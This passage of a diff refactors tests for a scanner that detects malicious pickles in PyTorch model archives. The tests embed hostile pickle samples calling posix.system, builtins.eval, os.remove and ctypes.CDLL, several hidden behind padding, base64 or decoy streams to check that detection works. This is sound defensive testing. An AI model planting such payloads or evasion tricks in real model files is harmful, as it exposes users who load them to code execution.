notice in report.notices) - - -def test_scan_file_scans_after_long_malformed_separator_trusted_probe_prefix(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b"\xff" * 4094) + b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_after_expanded_malformed_separator_prefix(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b"\xff" * 65_536) + b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_reports_large_malformed_separator_tensor_noise_incomplete(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b"\xff" * 100_000) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.INCONCLUSIVE - assert report.verdict == SafetyVerdict.UNKNOWN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any(notice.code == "parse_incomplete" for notice in report.notices) - - -def test_scan_file_skips_malformed_separator_tensor_noise_near_match(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b"c" * 100) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] - - -def test_scan_file_scans_malformed_separator_unicode_literal_nested_pickle(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - encoded = base64.b64encode(b"cbuiltins\neval\n(S'1'\ntR.") - storage_blob = b"N.!V" + encoded + b"\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "S601" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_skips_large_proto0_global_like_tensor_noise(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b"c" * 100_000) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] - - -def test_scan_file_skips_encoded_marker_density_scalar_tensor_noise(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = _proto0_string_literal(b"a" * 512) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] - - -def test_trailing_candidate_raw_scan_bounds_invalid_marker_attempts(monkeypatch: pytest.MonkeyPatch) -> None: - call_count = 0 - original = package_api._has_security_relevant_pickle_opcode - - def counted_has_security_relevant_pickle_opcode(sample: bytes) -> bool: - nonlocal call_count - call_count += 1 - return original(sample) - - monkeypatch.setattr( - package_api, - "_has_security_relevant_pickle_opcode", - counted_has_security_relevant_pickle_opcode, - ) - - assert ( - package_api._trailing_candidate_has_raw_nested_security_pickle(b"c" * 100_000, sample_is_prefix=False) is False - ) - assert call_count <= package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES - - -def test_trailing_candidate_raw_scan_fails_closed_after_candidate_budget() -> None: - value = ( - b"c!" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES + 1) - + (b"X" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATE_BYTES + 10)) - + b"cos\nremove\n(S'/tmp/test'\ntR." - ) - - assert package_api._trailing_candidate_has_raw_nested_security_pickle(value, sample_is_prefix=False) is True - - -def test_trailing_candidate_raw_scan_preserves_outer_prefix_state() -> None: - assert package_api._trailing_candidate_has_raw_nested_security_pickle(b"!\x80\x04N", sample_is_prefix=True) is True - assert ( - package_api._trailing_candidate_has_raw_nested_security_pickle(b"!\x80\x04N", sample_is_prefix=False) is False - ) - - -def test_security_opcode_probe_skips_repeated_none_streams_linearly(monkeypatch: pytest.MonkeyPatch) -> None: - call_count = 0 - original_genops = package_api.pickletools.genops - - def counted_genops(sample: bytes) -> collections.abc.Iterator[Any]: - nonlocal call_count - call_count += 1 - yield from original_genops(sample) - - monkeypatch.setattr(package_api.pickletools, "genops", counted_genops) - - assert package_api._has_security_relevant_pickle_opcode(b"N." * 1200 + b"cposix\nsystem\n(S'echo hidden'\ntR.") - assert call_count <= 2 - - -def test_literal_text_route_ignores_oversized_base64_compatible_noise() -> None: - assert package_api._literal_value_has_storage_scan_signal(b"A" * 100_000) is False +def test_literal_text_route_ignores_oversized_base64_compatible_noise() -> None: + assert package_api._literal_value_has_storage_scan_signal(b"A" * 100_000) is False def test_literal_text_route_bounds_spaced_call_near_match() -> None: @@ -8280,23 +6992,7 @@ def test_scan_file_routes_binary_pickle_after_raw_candidate_budget_gap(tmp_path: nested_pickle = b"\x80\x04cbuiltins\neval\n(S'1+1'\ntR." literal = (b"c" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES + 1)) + b"ZZZZ" + nested_pickle storage_blob = _proto0_string_literal(literal) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_routes_binary_pickle_after_long_raw_candidate_budget_gap(tmp_path: Path) -> None: @@ -8304,23 +7000,7 @@ def test_scan_file_routes_binary_pickle_after_long_raw_candidate_budget_gap(tmp_ nested_pickle = b"\x80\x04\x8c\x08builtins\x94\x8c\x04eval\x94\x93\x8c\x031+1\x94\x85R." literal = (b"c" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES + 1)) + (b"!" * 9_000) + nested_pickle storage_blob = _proto0_string_literal(literal) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_routes_global_after_malformed_global_candidate(tmp_path: Path) -> None: @@ -8331,46 +7011,14 @@ def test_scan_file_routes_global_after_malformed_global_candidate(tmp_path: Path + b"cctypes\nCDLL\n(S'evil.so'\ntR." ) storage_blob = _proto0_string_literal(literal) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_preserves_embedded_bytes_in_mixed_unicode_literal(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" nested_pickle = b"\x80\x04\x8c\x02os\x94\x8c\x06system\x94\x93\x8c\x04true\x94\x85R." storage_blob = pickle.dumps("\u2603" + nested_pickle.decode("latin-1"), protocol=0) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_routes_later_binary_pickle_after_benign_binary_decoy(tmp_path: Path) -> None: @@ -8379,23 +7027,7 @@ def test_scan_file_routes_later_binary_pickle_after_benign_binary_decoy(tmp_path nested_pickle = b"\x80\x04\x8c\x08builtins\x94\x8c\x04eval\x94\x93\x8c\x031+1\x94\x85R." literal = b"N." + (b"c" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES + 6)) + benign_decoy + b"!" + nested_pickle storage_blob = _proto0_string_literal(literal) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_routes_headerless_binary_pickle_after_budget_noise(tmp_path: Path) -> None: @@ -8403,46 +7035,14 @@ def test_scan_file_routes_headerless_binary_pickle_after_budget_noise(tmp_path: nested_pickle = b"\x8c\x02os\x8c\x06system\x93)R." literal = (b"c" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES + 1)) + (b"!" * 100) + nested_pickle storage_blob = _proto0_string_literal(literal) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_routes_direct_headerless_byte_literal_storage(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - encoded = base64.b64encode(b"cposix\nsystem\n)R.") - storage_blob = b"C" + bytes([len(encoded)]) + encoded + b"." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) + _assert_storage_pickle_detected(archive_path, storage_blob) - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + +def test_scan_file_routes_direct_headerless_byte_literal_storage(tmp_path: Path) -> None: + archive_path = tmp_path / "model.pt" + encoded = base64.b64encode(b"cposix\nsystem\n)R.") + storage_blob = b"C" + bytes([len(encoded)]) + encoded + b"." + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_routes_long_headerless_binbytes_storage(tmp_path: Path) -> None: @@ -8468,66 +7068,15 @@ def test_scan_file_routes_long_headerless_binbytes_storage(tmp_path: Path) -> No ) -def test_scan_file_routes_padded_headerless_byte_literal_storage(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"C\x06benign." + (b" " * 5000) + b"cposix\nsystem\n)R." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - def test_scan_file_routes_redundantly_padded_base64_literal_storage(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" encoded = base64.b64encode(b"cposix\nsystem\n)R.") + b"=" storage_blob = b"S'" + encoded + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_skips_direct_headerless_byte_literal_near_match(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"C\x06benign." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] + _assert_separator_near_match_unrecognized(tmp_path, b"C\x06benign.") def test_scan_file_skips_impossible_headerless_binbytes_length(tmp_path: Path) -> None: @@ -8620,23 +7169,7 @@ def test_scan_file_routes_bytearray8_literal_after_trivial_prefix(tmp_path: Path archive_path = tmp_path / "model.pt" encoded = base64.b64encode(b"cposix\nsystem\n)R.") storage_blob = b"N.\x96" + len(encoded).to_bytes(8, "little") + encoded + b"." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_routes_extension_opcode_after_raw_candidate_budget_gap(tmp_path: Path) -> None: @@ -8694,39 +7227,18 @@ def test_scan_file_scans_punctuation_base64_nested_pickle_literal( encoded = base64.b64encode(b"cposix\nsystem\n)R.") punctuated = separator.join(encoded[index : index + 4] for index in range(0, len(encoded), 4)) storage_blob = _proto0_string_literal(punctuated) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_raw_nested_literal_candidates_fail_closed_after_budget(monkeypatch: pytest.MonkeyPatch) -> None: - calls = 0 - - def no_security_opcode(_candidate: bytes) -> bool: - nonlocal calls - calls += 1 - return False + no_security_opcode = create_autospec(lambda _candidate: False, return_value=False) monkeypatch.setattr(package_api, "_has_security_relevant_pickle_opcode", no_security_opcode) value = b"c" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES + 1) assert package_api._literal_value_has_raw_nested_security_pickle(value) is False - assert calls == package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES + assert no_security_opcode.call_count == package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES def test_raw_nested_literal_routes_extension_operand_after_budget_exhaustion() -> None: @@ -8744,19 +7256,14 @@ def test_raw_nested_literal_preserves_text_marker_after_budget_exhaustion() -> N def test_raw_nested_structural_fallback_bounds_binary_opcode_candidates( monkeypatch: pytest.MonkeyPatch, ) -> None: - calls = 0 - - def no_binary_signal(_candidate: bytes, *, candidate_is_prefix: bool) -> bool: - nonlocal calls - calls += 1 - return False + no_binary_signal = create_autospec(lambda _candidate, *, candidate_is_prefix: False, return_value=False) monkeypatch.setattr(package_api, "_raw_nested_binary_candidate_should_scan", no_binary_signal) value = b"\x8c\x00" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES + 10) assert package_api._raw_nested_security_pickle_candidate_has_structural_signal(value) is True - assert calls == package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES + assert no_binary_signal.call_count == package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES def test_scan_file_skips_scalar_literal_raw_nested_near_match(tmp_path: Path) -> None: @@ -8783,23 +7290,7 @@ def test_scan_file_scans_comment_marker_split_at_trusted_probe_boundary(tmp_path storage_prefix = b"N." + (b" " * (package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"N.") - len(b"#"))) + b"#" assert len(storage_prefix) == package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES storage_blob = storage_prefix + b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_marks_repeated_trivial_streams_filling_expanded_probe_inconclusive( @@ -8853,84 +7344,20 @@ def test_scan_file_bounds_repeated_trivial_streams_after_nul_padding(tmp_path: P def test_trailing_candidate_consumes_repeated_trivial_streams_before_suffix_parse( monkeypatch: pytest.MonkeyPatch, ) -> None: - calls = 0 original = package_api._trivial_complete_pickle_prefix_trailing - def counted_trivial_prefix_trailing(sample: bytes) -> bytes | None: - nonlocal calls - calls += 1 - return original(sample) + counted_trivial_prefix_trailing = create_autospec(original, side_effect=original) monkeypatch.setattr(package_api, "_trivial_complete_pickle_prefix_trailing", counted_trivial_prefix_trailing) assert package_api._trailing_pickle_candidate_needs_more_bytes(b"N." * 32768) is False - assert calls == 0 + assert counted_trivial_prefix_trailing.call_count == 0 def test_scan_file_scans_comment_prefixed_pickle_after_trivial_scalar_prefix(tmp_path: Path) -> None: archive_path = tmp_path / "model.pt" storage_blob = b"N.#cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_comment_prefixed_pickle_after_many_trivial_streams(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N.#" + (b"N." * 1200) + b"cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) - - -def test_scan_file_scans_comment_prefixed_pickle_after_many_proto0_int_streams(tmp_path: Path) -> None: - archive_path = tmp_path / "model.pt" - storage_blob = b"N." + (b"I1\n." * 1200) + b"#cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) def test_scan_file_scans_persid_after_trivial_prefix_crossing_probe_boundary(tmp_path: Path) -> None: @@ -8983,23 +7410,7 @@ def test_scan_file_scans_frame_first_pickle_after_trivial_scalar_prefix(tmp_path archive_path = tmp_path / "model.pt" payload = b"cbuiltins\neval\n(S'print(1)'\ntR." storage_blob = b"N." + b"\x95" + len(payload).to_bytes(8, "little") + payload - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - archive.writestr("archive/version", "3\n") - archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", storage_blob) - - report = scan_file(archive_path) - - assert report.verdict == SafetyVerdict.MALICIOUS - assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.location is not None - and f"{archive_path}:archive/data/0" in finding.location - for finding in report.findings - ) + _assert_storage_pickle_detected(archive_path, storage_blob) @pytest.mark.parametrize( @@ -9882,16 +8293,7 @@ def test_scan_file_detects_hidden_pytorch_zip_pickle_member_without_data_pickle( def test_scan_file_leaves_hidden_pickle_like_zip_without_pytorch_metadata_unrecognized(tmp_path: Path) -> None: - archive_path = tmp_path / "hidden-only.zip" - entry = zipfile.ZipInfo("archive/payload", (1980, 1, 1, 0, 0, 0)) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr(entry, pickle.dumps({"weights": [1, 2, 3]}, protocol=4)) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.ERROR - assert report.verdict == SafetyVerdict.UNKNOWN - assert "container_type" not in report.metadata + _assert_hidden_generic_zip_unrecognized(tmp_path, "hidden-only.zip", "archive/payload") def test_scan_file_returns_error_report_for_pytorch_zip_member_access_failure( @@ -9932,16 +8334,7 @@ def fail_member_open( def test_scan_file_leaves_generic_data_pickle_zip_as_raw_pickle_input(tmp_path: Path) -> None: - archive_path = tmp_path / "generic.jpg" - entry = zipfile.ZipInfo("data.pkl", (1980, 1, 1, 0, 0, 0)) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr(entry, pickle.dumps({"weights": [1, 2, 3]}, protocol=4)) - - report = scan_file(archive_path) - - assert report.status == ScanStatus.ERROR - assert report.verdict == SafetyVerdict.UNKNOWN - assert "container_type" not in report.metadata + _assert_hidden_generic_zip_unrecognized(tmp_path, "generic.jpg", "data.pkl") def test_scan_file_marks_oversized_pytorch_zip_member_inconclusive( @@ -10666,40 +9059,12 @@ def test_scan_bytes_post_budget_tail_handles_stack_global_at_boundary() -> None: def test_scan_bytes_post_budget_tail_detects_default_protocol_stack_global() -> None: - payload = b"\x80\x04\x88\x88" + pickle.dumps(MaliciousPayload(), protocol=4)[2:] - - report = scan_bytes( - payload, - source="budget-default-protocol-stack-global.pkl", - options=ScanOptions(max_opcodes=2, post_budget_scan_bytes=4096), - ) - - assert report.status == ScanStatus.INCONCLUSIVE - assert report.verdict == SafetyVerdict.MALICIOUS - assert any( - finding.rule_code == "POST_BUDGET_GLOBAL" - and finding.severity == Severity.CRITICAL - and f"{finding.details.get('module')}.{finding.details.get('name')}" in SYSTEM_GLOBALS - for finding in report.findings - ) + _assert_default_protocol_stack_global_tail(b"\x80\x04\x88\x88", "budget-default-protocol-stack-global.pkl") def test_scan_bytes_post_budget_tail_resynchronizes_after_malformed_bytes() -> None: - payload = b"\x80\x04\x88\x88\xff" + pickle.dumps(MaliciousPayload(), protocol=4)[2:] - - report = scan_bytes( - payload, - source="budget-malformed-default-protocol-stack-global.pkl", - options=ScanOptions(max_opcodes=2, post_budget_scan_bytes=4096), - ) - - assert report.status == ScanStatus.INCONCLUSIVE - assert report.verdict == SafetyVerdict.MALICIOUS - assert any( - finding.rule_code == "POST_BUDGET_GLOBAL" - and finding.severity == Severity.CRITICAL - and f"{finding.details.get('module')}.{finding.details.get('name')}" in SYSTEM_GLOBALS - for finding in report.findings + _assert_default_protocol_stack_global_tail( + b"\x80\x04\x88\x88\xff", "budget-malformed-default-protocol-stack-global.pkl" ) @@ -10792,26 +9157,10 @@ def test_scan_bytes_post_budget_tail_detects_prememoized_stack_global() -> None: "memo-module-short-binstring-name", "memo-module-protocol0-name", 